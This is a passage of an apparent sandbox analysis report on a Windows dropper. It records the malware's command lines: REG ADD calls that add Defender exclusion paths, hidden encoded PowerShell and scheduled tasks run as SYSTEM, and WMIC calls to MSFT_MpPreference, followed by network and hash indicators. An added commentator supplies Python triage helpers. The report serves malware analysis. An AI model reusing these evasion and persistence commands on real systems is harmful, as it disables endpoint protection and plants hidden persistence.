Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HbtuuClNkkkdGbCN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HbtuuClNkkkdGbCN\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gqGXyUtcu" /SC once /ST 06:42:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gqGXyUtcu"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gqGXyUtcu"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eKTzntQiDjkvtKkfQ" /SC once /ST 11:15:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe\" qB /Zgsite_idObI 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "eKTzntQiDjkvtKkfQ"

C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe

C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe qB /Zgsite_idObI 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bjzvzwrptCEFdBfgJx"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "azeUktJAaUwkEYH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "azeUktJAaUwkEYH2" /F /xml "C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "azeUktJAaUwkEYH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "azeUktJAaUwkEYH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "OSQnjExwMsDOMr" /F /xml "C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAxEQLlfNMoXA2" /F /xml "C:\ProgramData\hdPjkOXNzukcsjVB\cntsWEX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KELEMENFVUYfdfdjp2" /F /xml "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "hcXcPAZNWkBjDRtiAcA2" /F /xml "C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "CtcwvJUdbvqSdFcLs" /SC once /ST 17:52:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll\",#1 /QIsite_idWIB 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "CtcwvJUdbvqSdFcLs"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll",#1 /QIsite_idWIB 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll",#1 /QIsite_idWIB 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eKTzntQiDjkvtKkfQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "CtcwvJUdbvqSdFcLs"
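
The process tree above shows the defence-evasion and persistence chain end to end: one PowerShell one-liner strings together REG ADD calls that register every drop directory under the Windows Defender Exclusions\Paths policy key, once with /reg:32 and once with /reg:64; a hidden scheduled task running as the logged-on user executes an -EncodedCommand whose payload is a hidden gpupdate /force (the Files section below also records a write to C:\Windows\system32\GroupPolicy\Machine\Registry.pol, the local policy store gpupdate applies); forfiles is used as a proxy launcher for a cmd, PowerShell and WMIC chain that removes an ExclusionExtension entry through MSFT_MpPreference; and further tasks created with /RU SYSTEM launch the dropped EXE and DLLs from C:\Windows\Temp, C:\ProgramData and C:\Program Files (x86), each task being run immediately and then deleted. One caveat when reading the REG ADD pairs: HKLM\SOFTWARE\Policies is on Microsoft's list of keys WOW64 shares between the 32-bit and 64-bit views rather than redirecting to WOW6432Node, so the /reg:32 and /reg:64 writes should resolve to the same value; confirm that on the host rather than assuming two copies.

The Python below is an added triage example, not code from the report or from the sample. It decodes the -EncodedCommand payload, collects the excluded paths together with the registry view they were written through, lists every schtasks /CREATE with its run-as account and action so that SYSTEM tasks pointing into drop directories stand out, and extracts MSFT_MpPreference calls. SAMPLE_CMDLINES is a subset of the command lines listed above; DROP_DIRS and the regular expressions are constructed for this example.

```python
"""Triage helpers for sandbox process-tree command lines (added example, not report code).

Decodes -EncodedCommand payloads, extracts Defender policy exclusions from REG ADD
chains and lists schtasks /CREATE definitions. Sample lines are copied from the
report above; DROP_DIRS and the regexes are constructed assumptions for this example.
"""
import base64
import re
from collections import defaultdict

# Constructed sample: a subset of the command lines listed in the process tree above.
SAMPLE_CMDLINES = [
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:32;"',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:64',
    r'schtasks /CREATE /TN "gqGXyUtcu" /SC once /ST 06:42:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "eKTzntQiDjkvtKkfQ" /SC once /ST 11:15:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe\" qB /Zgsite_idObI 385118 /S" /V1 /F',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "azeUktJAaUwkEYH" /V1 /F',
    r'schtasks /CREATE /TN "azeUktJAaUwkEYH2" /F /xml "C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml" /RU "SYSTEM"',
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True',
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# REG ADD against the Defender Exclusions policy key, quoted either as "..." or as \"...\"
# inside a PowerShell string; /reg:32 vs /reg:64 is the WOW64 registry view requested.
EXCLUSION_RE = re.compile(
    r'(?:\bREG|reg\.exe"?)\s+ADD\s+'
    r'\\?"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\'
    r'(?P<kind>Paths|Extensions|Processes)\\?"\s+(?:/f\s+)?/v\s+'
    r'(?:\\?"(?P<quoted>[^"]+?)\\?"|(?P<bare>\S+))(?:.*?/reg:(?P<view>32|64))?',
    re.I,
)
# Directories the dropper writes into and later schedules tasks from (constructed list).
DROP_DIRS = ("c:\\windows\\temp\\", "c:\\programdata\\", "c:\\program files (x86)\\", "\\appdata\\local\\temp\\")


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def defender_policy_exclusions(cmdlines):
    """Map (kind, excluded value) -> sorted list of registry views it was written through."""
    found = defaultdict(set)
    for line in cmdlines:
        for m in EXCLUSION_RE.finditer(line):
            value = m.group("quoted") if m.group("quoted") is not None else m.group("bare")
            found[(m.group("kind").capitalize(), value.rstrip("\\"))].add(m.group("view") or "native")
    return {k: sorted(v) for k, v in found.items()}


def _flag(cmdline, flag):
    """Value of a schtasks /FLAG, honouring double-quoted values and backslash-escaped quotes in /TR."""
    m = re.search(rf'/{flag}\s+(?:"((?:\\.|[^"\\])*)"|(\S+))', cmdline, re.I)
    if not m:
        return None
    value = m.group(1) if m.group(1) is not None else m.group(2)
    return value.replace('\\"', '"')


def scheduled_tasks(cmdlines):
    """One record per schtasks /CREATE: name, run-as account, schedule, action or XML, decoded payload."""
    tasks = []
    for line in cmdlines:
        if re.search(r"\bschtasks(?:\.exe)?\b.*\s/create\b", line, re.I):
            tasks.append({"name": _flag(line, "TN"), "runas": _flag(line, "RU"),
                          "schedule": _flag(line, "SC"), "action": _flag(line, "TR"),
                          "xml": _flag(line, "XML"), "decoded": decode_encoded_command(line)})
    return tasks


def suspicious_tasks(tasks):
    """Names of tasks that run as SYSTEM from a drop directory, directly or via an XML definition."""
    hits = []
    for t in tasks:
        target = (t["action"] or t["xml"] or "").lower()
        if (t["runas"] or "").upper() == "SYSTEM" and any(d in target for d in DROP_DIRS):
            hits.append(t["name"])
    return hits


def defender_preference_calls(cmdlines):
    """(method, arguments) of WMI calls against MSFT_MpPreference, e.g. Remove ExclusionExtension=exe."""
    pat = re.compile(r"MSFT_MpPreference\s+call\s+(\w+)\s*(.*)$", re.I)
    return [(m.group(1), m.group(2).strip()) for m in map(pat.search, cmdlines) if m]


if __name__ == "__main__":
    print(defender_policy_exclusions(SAMPLE_CMDLINES))
    tasks = scheduled_tasks(SAMPLE_CMDLINES)
    print(tasks, suspicious_tasks(tasks), defender_preference_calls(SAMPLE_CMDLINES))
```

Run against the sample, the decoder returns `start-process -WindowStyle Hidden gpupdate.exe /force` for the gqGXyUtcu task, which matches the gpupdate.exe child shown above; the exclusion map keeps both views per path so the /reg:32 and /reg:64 pairing is visible; and the three SYSTEM tasks whose action or XML sits under C:\Windows\Temp or C:\Program Files (x86) are the ones flagged. Feeding the full command-line list from a report into the same functions is a quick way to build the path, task-name and DLL indicators to hunt for.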

Network

Country  Destination           Domain                           Proto
US       8.8.8.8:53            241.150.49.20.in-addr.arpa       udp
US       8.8.8.8:53            240.197.17.2.in-addr.arpa        udp
GB       23.44.234.16:80                                        tcp
US       8.8.8.8:53            22.160.190.20.in-addr.arpa       udp
US       8.8.8.8:53            154.239.44.20.in-addr.arpa       udp
N/A      224.0.0.251:5353                                       udp
US       8.8.8.8:53            159.113.53.23.in-addr.arpa       udp
US       8.8.8.8:53            103.169.127.40.in-addr.arpa      udp
US       8.8.8.8:53            15.164.165.52.in-addr.arpa       udp
US       8.8.8.8:53            121.118.77.104.in-addr.arpa      udp
US       8.8.8.8:53            service-domain.xyz               udp
US       3.80.150.121:443      service-domain.xyz               tcp
US       8.8.8.8:53            121.150.80.3.in-addr.arpa        udp
US       8.8.8.8:53            11.97.55.23.in-addr.arpa         udp
US       8.8.8.8:53            171.101.63.23.in-addr.arpa       udp
US       8.8.8.8:53            clients2.google.com              udp
DE       142.250.185.174:443   clients2.google.com              tcp
US       8.8.8.8:53            clients2.googleusercontent.com   udp
DE       142.250.186.65:443    clients2.googleusercontent.com   tcp
US       8.8.8.8:53            74.185.250.142.in-addr.arpa      udp
US       8.8.8.8:53            174.185.250.142.in-addr.arpa     udp
US       8.8.8.8:53            131.16.217.172.in-addr.arpa      udp
DE       142.250.185.174:443   clients2.google.com              tcp
US       8.8.8.8:53            65.186.250.142.in-addr.arpa      udp
US       8.8.8.8:53            api2.check-data.xyz              udp
US       44.240.147.44:80      api2.check-data.xyz              tcp
US       8.8.8.8:53            44.147.240.44.in-addr.arpa       udp
US       8.8.8.8:53            240.221.184.93.in-addr.arpa      udp
US       8.8.8.8:53            30.243.111.52.in-addr.arpa       udp
US       8.8.8.8:53            25.73.42.20.in-addr.arpa         udp
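
The Network table mixes three kinds of rows: outbound connections, forward DNS queries to the sandbox resolver (8.8.8.8:53), and PTR lookups (the in-addr.arpa names). The PTR rows are reverse lookups of addresses the host saw, not hostnames the sample reached out to: 121.150.80.3.in-addr.arpa is the reverse of 3.80.150.121 (the service-domain.xyz peer), 174.185.250.142 and 65.186.250.142 reverse to the two clients2 Google peers, and 44.147.240.44 reverses to 44.240.147.44, the api2.check-data.xyz peer one row earlier. Copying those names into a blocklist is a common triage mistake. What remains as candidate indicators are the two forward-resolved domains, service-domain.xyz and api2.check-data.xyz, with their TCP peers; the clients2.google.com and clients2.googleusercontent.com traffic is Chrome's extension update and download path, consistent with the dropped Chrome extension but not an indicator on its own.

The Python below is an added example, not part of the report. It parses rows in the table's own layout (the Domain column may be empty), folds PTR names back into IP addresses, pairs those with the recorded connections, and leaves a short candidate-IOC list. NETWORK_ROWS is a subset copied from the table; the resolver address and the KNOWN_BENIGN allowlist are constructed assumptions.

```python
"""Split a sandbox Network table into connections, forward DNS, PTR noise and candidate IOCs.

Added example, not part of the original report. NETWORK_ROWS is a subset copied from
the table above; RESOLVERS and KNOWN_BENIGN are constructed assumptions.
"""
import re

NETWORK_ROWS = """\
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
GB 23.44.234.16:80 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 clients2.google.com udp
DE 142.250.185.174:443 clients2.google.com tcp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.240.147.44:80 api2.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
"""

RESOLVERS = {"8.8.8.8"}  # assumption: every :53 row to this address is a DNS query, not a contact
# Constructed allowlist: Chrome's extension update/download hosts. Seeing them is consistent
# with the dropped Chrome extension, but they are not indicators in their own right.
KNOWN_BENIGN = {"clients2.google.com", "clients2.googleusercontent.com"}


def parse_rows(text):
    """Rows read 'Country Destination [Domain] Proto'; the Domain column may be empty."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue  # blank line
        ip, sep, port = dest.rpartition(":")
        if not sep or not port.isdigit():
            continue  # header line or malformed destination
        rows.append({"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return rows


def reverse_ptr(name):
    """'d.c.b.a.in-addr.arpa' -> 'a.b.c.d'; None when the name is not an IPv4 PTR query."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa\.?", name, re.I)
    return ".".join(reversed(m.groups())) if m else None


def summarise(rows):
    """Separate queries from connections, fold PTR names back to IPs, and list what is left."""
    queries, conns = [], []
    for r in rows:
        (queries if r["port"] == 53 and r["ip"] in RESOLVERS else conns).append(r)
    peers = {c["ip"] for c in conns}
    ptr_targets = sorted({reverse_ptr(q["domain"]) for q in queries} - {None})
    forward = sorted({q["domain"] for q in queries if q["domain"] and reverse_ptr(q["domain"]) is None})
    return {
        "connections": sorted((c["ip"], c["port"], c["proto"], c["domain"]) for c in conns),
        "forward_queries": forward,
        "ptr_for_known_peer": [ip for ip in ptr_targets if ip in peers],   # reverse lookups of recorded peers
        "ptr_unexplained": [ip for ip in ptr_targets if ip not in peers],  # worth a look, still not contacts
        "candidate_iocs": [d for d in forward if d not in KNOWN_BENIGN],
    }


if __name__ == "__main__":
    for key, value in summarise(parse_rows(NETWORK_ROWS)).items():
        print(key, value)
```

On the sample rows this leaves api2.check-data.xyz and service-domain.xyz as candidate indicators, reports 44.240.147.44 as a PTR lookup of a peer already in the connection list, and surfaces 20.49.150.241 (from 241.150.49.20.in-addr.arpa) as a reverse lookup with no matching connection. Connections with an empty Domain column, such as 23.44.234.16:80 and the mDNS multicast row, are kept as bare IP and port pairs rather than dropped.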

Files

C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe

MD5 0a35bbd6448122353a2d8ea91cff5781
SHA1 742ec335853eba4e5b41200fa46958328e90cb2f
SHA256 ccc5f37eb38a137f33f8f0d603f88f178056a9c576c316f6a366727e07c9a0bb
SHA512 5c4dbc03b3c43ddea27bb6df56e5e317c64237018e325a84b257847e4223f0c3302f10b9ab5956ef7e197c237f7d346fbddbb7ee06856b42314cc0b85f300b8f

memory/1648-16-0x00000000008B0000-0x0000000000F65000-memory.dmp

memory/1648-17-0x0000000010000000-0x0000000011E5C000-memory.dmp

memory/3168-20-0x0000000002E80000-0x0000000002EB6000-memory.dmp

memory/3168-21-0x0000000073620000-0x0000000073DD0000-memory.dmp

memory/3168-23-0x0000000002ED0000-0x0000000002EE0000-memory.dmp

memory/3168-22-0x0000000002ED0000-0x0000000002EE0000-memory.dmp

memory/3168-24-0x0000000005790000-0x0000000005DB8000-memory.dmp

memory/3168-25-0x00000000054C0000-0x00000000054E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rtfjjuiw.gm4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3168-26-0x0000000005DC0000-0x0000000005E26000-memory.dmp

memory/3168-32-0x0000000005E30000-0x0000000005E96000-memory.dmp

memory/3168-37-0x0000000005FA0000-0x00000000062F4000-memory.dmp

memory/3168-38-0x0000000006470000-0x000000000648E000-memory.dmp

memory/3168-39-0x00000000064C0000-0x000000000650C000-memory.dmp

memory/3168-42-0x0000000073620000-0x0000000073DD0000-memory.dmp

memory/1648-46-0x00000000008B0000-0x0000000000F65000-memory.dmp

memory/4644-48-0x00000000006F0000-0x0000000000DA5000-memory.dmp

memory/4644-49-0x0000000010000000-0x0000000011E5C000-memory.dmp

memory/1112-52-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/1112-53-0x00000000034C0000-0x00000000034D0000-memory.dmp

memory/1112-54-0x00000000034C0000-0x00000000034D0000-memory.dmp

memory/1112-64-0x0000000004320000-0x0000000004674000-memory.dmp

memory/1112-65-0x00000000049A0000-0x00000000049EC000-memory.dmp

memory/1112-68-0x00000000735F0000-0x0000000073DA0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/4708-70-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/4708-72-0x0000000003230000-0x0000000003240000-memory.dmp

